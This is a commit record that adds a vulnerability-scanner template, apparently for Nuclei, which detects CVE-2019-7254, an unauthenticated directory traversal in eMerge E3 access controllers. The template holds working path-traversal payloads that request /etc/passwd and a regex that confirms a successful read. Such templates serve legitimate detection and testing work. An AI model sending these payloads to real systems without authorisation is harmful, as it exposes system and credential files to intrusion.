Merge pull request #1690 from Akokonunes/patch-7

Create CVE-2019-7254.yaml
patch-1
Prince Chaddha 2021-06-13 21:02:31 +05:30 committed by GitHub
commit a52b25bfaa
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 25 additions and 0 deletions

View File

@ -0,0 +1,25 @@
id: CVE-2019-7254
info:
name: eMerge E3 1.00-06 - Unauthenticated Directory Traversal
author: 0x_Akoko
severity: high
reference: https://www.exploit-db.com/exploits/47616
tags: emerge,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/?c=../../../../../../etc/passwd%00"
- "{{BaseURL}}/badging/badge_print_v0.php?tpl=../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200